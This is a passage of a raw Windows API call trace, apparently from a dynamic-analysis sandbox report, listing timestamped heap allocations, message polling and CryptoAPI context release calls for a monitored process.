hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0254.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.375] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0254.375] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0254.375] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.375] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0254.375] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0254.375] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0254.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.491] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0254.491] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0254.491] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0254.491] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0254.491] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0254.492] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0254.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.492] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0254.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0254.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0254.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0254.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.493] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0254.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0254.494] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.494] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0254.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0254.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0254.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0254.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0254.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0254.496] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0254.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.497] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0254.499] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0254.499] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0254.499] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0254.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.499] FreeLibrary (hLibModule=0x756e0000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.499] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0254.499] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0254.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0254.499] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0254.500] RtlAllocateHeap 